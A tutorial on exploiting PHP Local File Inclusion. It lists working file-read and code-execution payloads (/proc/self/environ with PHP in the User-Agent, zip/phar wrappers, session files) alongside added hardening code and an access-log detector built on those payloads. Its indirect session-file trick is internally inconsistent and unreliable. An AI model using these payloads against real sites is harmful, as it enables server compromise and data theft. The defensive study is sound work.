# Tricky ways to exploit PHP Local File Inclusion
## Introduction
As described on [Wikipedia](https://en.wikipedia.org/wiki/File_inclusion_vulnerability#Local_File_Inclusion), Local File Inclusion (LFI) is similar to a Remote File Inclusion vulnerability, except that instead of remote files only local files, i.e. files already on the server, can be included for execution.
For instance:
```php
include $_GET['file'];
```
or a harder variant, where the application appends a fixed suffix to the attacker-controlled name:
```php
include $_GET['file'] . ".php";
```
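The two snippets above show the defect; what a reviewer wants next to them is the fix. The block below is an added example, not code from the original page: the vulnerable form sits beside a hardened replacement in which the request value is only a key into a fixed allowlist, with a `realpath` confinement check as a second, independent layer. The allowlist contents, the `pages/` directory and the function names are hypothetical.

```php
<?php
// Added example (not from the original page): the vulnerable pattern beside a
// hardened replacement. Function, directory and page names are hypothetical.

// Vulnerable form, as on the page: whatever ?file= names gets included, so
// absolute paths and stream wrappers (php://, zip://, phar://) are accepted.
function include_page_vulnerable(array $get): void
{
    include $get['file'] . ".php";
}

// Hardened form: the request value is only a key into a fixed allowlist.
// Nothing the client sends ever becomes part of a path.
const PAGE_ALLOWLIST = [
    'home'    => 'pages/home.php',
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

function resolve_page(string $requested): ?string
{
    // Reject anything that is not a plain identifier before the lookup, so
    // wrapper schemes ("php://..."), slashes and dots never reach include.
    if (!preg_match('/\A[a-z0-9_-]{1,32}\z/', $requested)) {
        return null;
    }
    return PAGE_ALLOWLIST[$requested] ?? null;
}

function include_page_hardened(array $get, string $baseDir): bool
{
    $relative = resolve_page($get['file'] ?? '');
    if ($relative === null) {
        http_response_code(404);
        return false;
    }
    // Second, independent check: the resolved file must lie below $baseDir,
    // so a mistake in the allowlist itself cannot reach outside it.
    $base = realpath($baseDir);
    $full = realpath($baseDir . DIRECTORY_SEPARATOR . $relative);
    if ($base === false || $full === false
        || strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        http_response_code(404);
        return false;
    }
    include $full;
    return true;
}

// Constructed probes: the page's own payloads against the allowlist resolver.
foreach (['home', '/etc/passwd',
          'php://filter/convert.base64-encode/resource=config',
          'zip://image.zip#shell', '/var/lib/php5/sess_123'] as $probe) {
    printf("%-55s -> %s\n", $probe, resolve_page($probe) ?? 'rejected');
}
```

Run with `php` on the command line; every probe except `home` prints `rejected`. Note that `allow_url_include=Off` does not help against the payloads on this page, because `php://filter`, `zip://` and `phar://` are local wrappers; the allowlist (plus `open_basedir` as defence in depth) is what closes them.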
## Tricks
### Direct Local File Inclusion
- Reading arbitrary files:
  * `index.php?file=/etc/passwd`
  * `index.php?file=php://filter/convert.base64-encode/resource=config.php`
- Remote code execution:
  * `/proc/self/environ` (the PHP code is supplied in the `User-Agent` header):
    ```http
    GET /index.php?file=/proc/self/environ&cmd=id HTTP/1.1
    Host: www.site.com
    User-Agent: <?php echo assert($_GET['cmd']);?>
    ```
  * Zip and Phar wrappers:
    - `index.php?file=zip://image.zip#shell.php`
    - `index.php?file=phar://image.phar/shell.php`
  * Session files:
    - PHP 5 stores session files in `/var/lib/php5/sess_*`, named after the `PHPSESSID` cookie value
    ```
    Cookie: PHPSESSID=123php # /var/lib/php5/sess_123php
    index.php?file=/var/lib/php5/sess_123php
    ```
### Indirect Local File Inclusion
Here the application appends `.php` itself, so the payloads omit the suffix.
- Reading arbitrary files:
  * `index.php?file=php://filter/convert.base64-encode/resource=config` (the appended `.php` turns `config` into `config.php`)
- Remote code execution:
  * Zip and Phar wrappers:
    - `index.php?file=zip://image.zip#shell`
    - `index.php?file=phar://image.phar/shell`
  * Session files:
    - PHP 5 stores session files in `/var/lib/php5/sess_*`; a session id ending in `php` lets the appended suffix complete the file name
    ```
    Cookie: PHPSESSID=123php # /var/lib/php5/sess_123php
    index.php?file=/var/lib/php5/sess_123
    ```
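Every request in the Direct and Indirect sections above leaves a recognisable trace in the web server's access log. The block below is an added example, not code from the original page: a small detector that parses Apache combined-format log lines, URL-decodes the request, and flags the indicators the two sections list (`php://filter`, `zip://`, `phar://`, `/proc/self/environ`, `/etc/passwd`, `sess_*` paths, and a PHP open tag in the `User-Agent`, which the `/proc/self/environ` trick depends on). The log lines, client addresses and indicator names are constructed for the example.

```php
<?php
// Added example (not from the original page): flag the LFI request patterns
// listed on the page in Apache combined-format access log lines.
// Log lines below are constructed; indicator names are hypothetical.

const LFI_INDICATORS = [
    'php-filter-wrapper' => '~php://filter~i',
    'zip-wrapper'        => '~\bzip://~i',
    'phar-wrapper'       => '~\bphar://~i',
    'proc-self-environ'  => '~/proc/self/environ~i',
    'etc-passwd'         => '~/etc/passwd~i',
    'session-file'       => '~/sess_[a-z0-9]+~i',
];

/** Split one combined-format line into client, request and user-agent; null if it does not fit. */
function parse_combined(string $line): ?array
{
    // host ident user [time] "request" status size "referer" "user-agent"
    if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" \d{3} \S+ "[^"]*" "([^"]*)"$/', $line, $m)) {
        return null;
    }
    return ['client' => $m[1], 'request' => $m[2], 'ua' => $m[3]];
}

/** Return [client, indicator, evidence] triples for every suspicious line. */
function scan_lfi_indicators(array $lines): array
{
    $hits = [];
    foreach ($lines as $line) {
        $entry = parse_combined($line);
        if ($entry === null) {
            continue;
        }
        // Decode twice so a percent-encoded "php%3A%2F%2F" is still matched.
        $request = rawurldecode(rawurldecode($entry['request']));
        foreach (LFI_INDICATORS as $name => $re) {
            if (preg_match($re, $request)) {
                $hits[] = [$entry['client'], $name, $entry['request']];
            }
        }
        // The /proc/self/environ trick needs PHP code in a header that reaches
        // the environment, so a PHP open tag in the User-Agent is an indicator.
        if (stripos($entry['ua'], '<?php') !== false) {
            $hits[] = [$entry['client'], 'php-in-user-agent', $entry['ua']];
        }
    }
    return $hits;
}

// Constructed sample: one benign request, then the page's payloads.
$sample = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?file=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:13:55:40 +0000] "GET /index.php?file=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dconfig HTTP/1.1" 200 2048 "-" "curl/8.0"',
    '203.0.113.9 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?file=/proc/self/environ&cmd=id HTTP/1.1" 200 1301 "-" "<?php echo assert($_GET[\'cmd\']);?>"',
    '203.0.113.9 - - [10/Oct/2023:13:55:42 +0000] "GET /index.php?file=zip://image.zip%23shell HTTP/1.1" 500 0 "-" "curl/8.0"',
    '203.0.113.9 - - [10/Oct/2023:13:55:43 +0000] "GET /index.php?file=/var/lib/php5/sess_123 HTTP/1.1" 200 77 "-" "curl/8.0"',
];

foreach (scan_lfi_indicators($sample) as [$client, $name, $evidence]) {
    printf("%-12s %-20s %s\n", $client, $name, $evidence);
}
```

The benign first line produces no output; each of the other four is reported under its indicator, and the `/proc/self/environ` line is reported twice (once for the path, once for the PHP tag in the `User-Agent`). Matching against the decoded request rather than the raw one is what keeps the encoded `php://filter` variant from slipping through.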
## Reference
1. [File inclusion vulnerability](https://en.wikipedia.org/wiki/File_inclusion_vulnerability#Local_File_Inclusion)
2. [Including files via the zip/phar protocols](https://lightless.me/archives/include-file-from-zip-or-phar.html)
3. [AIS3 Final CTF Web Writeup (Race Condition & one-byte off SQL Injection)](http://blog.orange.tw/2015/09/ais3-final-ctf-web-writeup-race.html)
4. [lucyoa/ctf-wiki](https://github.com/lucyoa/ctf-wiki/tree/master/web/file-inclusion)